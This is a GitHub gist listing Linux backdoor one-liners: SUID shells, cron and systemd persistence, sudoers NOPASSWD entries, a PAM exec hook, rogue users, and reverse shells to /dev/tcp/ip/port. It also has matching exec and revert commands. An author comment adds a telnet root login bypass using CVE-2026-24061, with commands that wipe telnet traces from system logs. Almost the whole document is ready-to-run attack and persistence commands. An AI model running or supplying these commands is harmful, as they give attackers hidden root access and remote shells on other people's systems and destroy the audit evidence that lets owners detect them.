Skip to content

Instantly share code, notes, and snippets.

@azuk4r
Last active January 26, 2026 09:33
Show Gist options
  • Select an option

  • Save azuk4r/1d058697989b10e77c507a5922ae14db to your computer and use it in GitHub Desktop.

Select an option

Save azuk4r/1d058697989b10e77c507a5922ae14db to your computer and use it in GitHub Desktop.
common linux backdoor methods
# backdoors
chmod u+s /bin/bash
chmod u+s /bin/dash
echo '* * * * * root chmod u+s /bin/bash' >> /etc/crontab
echo '* * * * * root chmod u+s /bin/dash' >> /etc/crontab
echo 'username ALL=(ALL) NOPASSWD: /bin/bash' | sudo tee /etc/sudoers.d/backdoor > /dev/null && sudo chown root:root /etc/sudoers.d/backdoor && sudo chmod 440 /etc/sudoers.d/backdoor && sudo visudo -c
echo 'username ALL=(ALL) NOPASSWD: /bin/dash' | sudo tee /etc/sudoers.d/backdoor > /dev/null && sudo chown root:root /etc/sudoers.d/backdoor && sudo chmod 440 /etc/sudoers.d/backdoor && sudo visudo -c
echo -e "[Service]\nExecStart=/sbin/agetty --autologin root --noclear tty8 linux\nRestart=always\n[Install]\nWantedBy=multi-user.target" > /etc/systemd/system/backdoor.service && systemctl enable backdoor.service && systemctl start backdoor.service
echo -e '#!/bin/bash\nchmod u+s /bin/bash' > /usr/local/bin/.backdoor && chmod +x /usr/local/bin/.backdoor && echo 'auth optional pam_exec.so expose_authtok /usr/local/bin/.backdoor' >> /etc/pam.d/common-auth
echo -e '#!/bin/bash\nchmod u+s /bin/dash' > /usr/local/bin/.backdoor && chmod +x /usr/local/bin/.backdoor && echo 'auth optional pam_exec.so expose_authtok /usr/local/bin/.backdoor' >> /etc/pam.d/common-auth
useradd -m backdoor_user && echo "backdoor_user:CustomPassword" | chpasswd && usermod -aG sudo backdoor_user && usermod -s /bin/bash backdoor_user
useradd -m backdoor_user && echo "backdoor_user:CustomPassword" | chpasswd && usermod -aG sudo backdoor_user && usermod -s /bin/bash backdoor_user && sudo apt update && sudo apt install -y openssh-server && sudo systemctl start ssh && sudo systemctl enable ssh
echo '* * * * * root bash -c "while true; do bash -i >& /dev/tcp/ip/port 0>&1; sleep 10; done"' >> /etc/crontab
echo -e "[Unit]\nAfter=network.target\n\n[Service]\nExecStart=/bin/bash -c \"while true; do bash -i >& /dev/tcp/ip/port 0>&1; sleep 10; done\"\nRestart=always\nUser=root\nStandardOutput=null\nStandardError=null\n\n[Install]\nWantedBy=multi-user.target" | sudo tee /etc/systemd/system/backdoor.service > /dev/null && sudo systemctl enable backdoor.service && sudo systemctl start backdoor.service
echo -e '#!/bin/bash\nwhile true; do bash -i >& /dev/tcp/ip/port 0>&1; sleep 10; done &' > /usr/local/bin/.backdoor && chmod +x /usr/local/bin/.backdoor && echo 'auth optional pam_exec.so expose_authtok /usr/local/bin/.backdoor' >> /etc/pam.d/common-auth
(sudo DEBIAN_FRONTEND=noninteractive apt-get install -y inetutils-telnetd=2:2.5-6ubuntu1 telnet >/dev/null 2>&1; sudo sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf >/dev/null 2>&1; sudo /etc/init.d/inetutils-inetd start >/dev/null 2>&1; sleep 2; sudo sed -i '/telnet/Id' /var/log/auth.log /var/log/syslog /var/log/kern.log 2>/dev/null; sudo rm -f /var/log/*telnet* /run/*telnet* /var/run/*telnet*) >/dev/null 2>&1
# exec
bash -p
dash -p
bash -p
dash -p
sudo bash
sudo dash
Ctrl+Alt+F8
bash -p
dash -p
su backdoor_user
ssh backdoor_user@ip
nc -lnvp port
nc -lnvp port
nc -lnvp port
USER='-f root' telnet -a ip
# revert
sudo chmod u-s /bin/bash
sudo chmod u-s /bin/dash
sudo sed -i '/chmod u+s \/bin\/bash/d' /etc/crontab && sudo chmod u-s /bin/bash
sudo sed -i '/chmod u+s \/bin\/dash/d' /etc/crontab && sudo chmod u-s /bin/dash
sudo rm -f /etc/sudoers.d/backdoor && sudo visudo -c
sudo rm -f /etc/sudoers.d/backdoor && sudo visudo -c
sudo systemctl disable backdoor.service && sudo systemctl stop backdoor.service && sudo rm -f /etc/systemd/system/backdoor.service
sudo sed -i '/auth optional pam_exec.so expose_authtok \/usr\/local\/bin\/.backdoor/d' /etc/pam.d/common-auth && sudo rm -f /usr/local/bin/.backdoor && sudo chmod u-s /bin/bash
sudo sed -i '/auth optional pam_exec.so expose_authtok \/usr\/local\/bin\/.backdoor/d' /etc/pam.d/common-auth && sudo rm -f /usr/local/bin/.backdoor && sudo chmod u-s /bin/dash
sudo userdel -r backdoor_user
sudo pkill -9 -u backdoor_user && sleep 5 && sudo userdel -r backdoor_user && sudo apt remove --purge -y openssh-server && sudo systemctl stop ssh && sudo systemctl disable ssh
sudo sed -i '/bash -i >& \/dev\/tcp\/ip\/port/d' /etc/crontab && sudo kill $(ps aux | grep '/dev/tcp' | awk '{print $2}')
sudo systemctl disable backdoor.service && sudo systemctl stop backdoor.service && sudo rm -f /etc/systemd/system/backdoor.service
sudo sed -i '/auth optional pam_exec.so expose_authtok \/usr\/local\/bin\/.backdoor/d' /etc/pam.d/common-auth && sudo rm -f /usr/local/bin/.backdoor
(sudo /etc/init.d/inetutils-inetd stop; sudo DEBIAN_FRONTEND=noninteractive apt-get remove --purge -y inetutils-telnetd inetutils-telnet telnet inetutils-inetd; sudo apt-get autoremove --purge -y; sudo update-inetd --disable telnet || sudo sed -i 's/^telnet/#<off># telnet/' /etc/inetd.conf; sudo apt-get clean; sudo sed -i '/telnet/Id' /var/log/auth.log /var/log/syslog /var/log/kern.log) >/dev/null 2>&1
# by azuk4r
# ¬_¬
@azuk4r
Copy link
Author

azuk4r commented Jan 25, 2026

CVE-2026-24061

Added a telnet backdoor technique leveraging CVE-2026-24061, authentication bypass vulnerability affecting inetutils-telnetd from 1.9.3 to 2.7

Tested on:

OS: Ubuntu 25.04 x86_64
Kernel: Linux 6.14.0-37-generic

Prepare everything necessary:

  • The installation of inetutils-telnetd 2.5 on the test environment corresponds to inetutils-telnetd=2:2.5-6ubuntu1 (it will be different on other distributions)
(sudo DEBIAN_FRONTEND=noninteractive apt-get install -y inetutils-telnetd=2:2.5-6ubuntu1 telnet >/dev/null 2>&1; sudo sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf >/dev/null 2>&1; sudo /etc/init.d/inetutils-inetd start >/dev/null 2>&1; sleep 2; sudo sed -i '/telnet/Id' /var/log/auth.log /var/log/syslog /var/log/kern.log 2>/dev/null; sudo rm -f /var/log/*telnet* /run/*telnet* /var/run/*telnet*) >/dev/null 2>&1

Execute backdoor:

USER='-f root' telnet -a ip

Undo actions and delete traces:

  • WARNING: Please note that there may be other things running that depend on inetd. Modify the command in that case because this command will remove it
(sudo /etc/init.d/inetutils-inetd stop; sudo DEBIAN_FRONTEND=noninteractive apt-get remove --purge -y inetutils-telnetd inetutils-telnet telnet inetutils-inetd; sudo apt-get autoremove --purge -y; sudo update-inetd --disable telnet || sudo sed -i 's/^telnet/#<off># telnet/' /etc/inetd.conf; sudo apt-get clean; sudo sed -i '/telnet/Id' /var/log/auth.log /var/log/syslog /var/log/kern.log) >/dev/null 2>&1

Notes:

Please note that the commands are designed for my test environment

Credits:

This vulnerability was found and reported by Kyu Neushwaistein aka Carlos Cortes Alvarez on 2026-01-19
Vulnerable since: https://codeberg.org/inetutils/inetutils/commit/fa3245ac8c288b87139a0da8249d0a408c4dfb87
Reference: https://www.openwall.com/lists/oss-security/2026/01/20/2

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment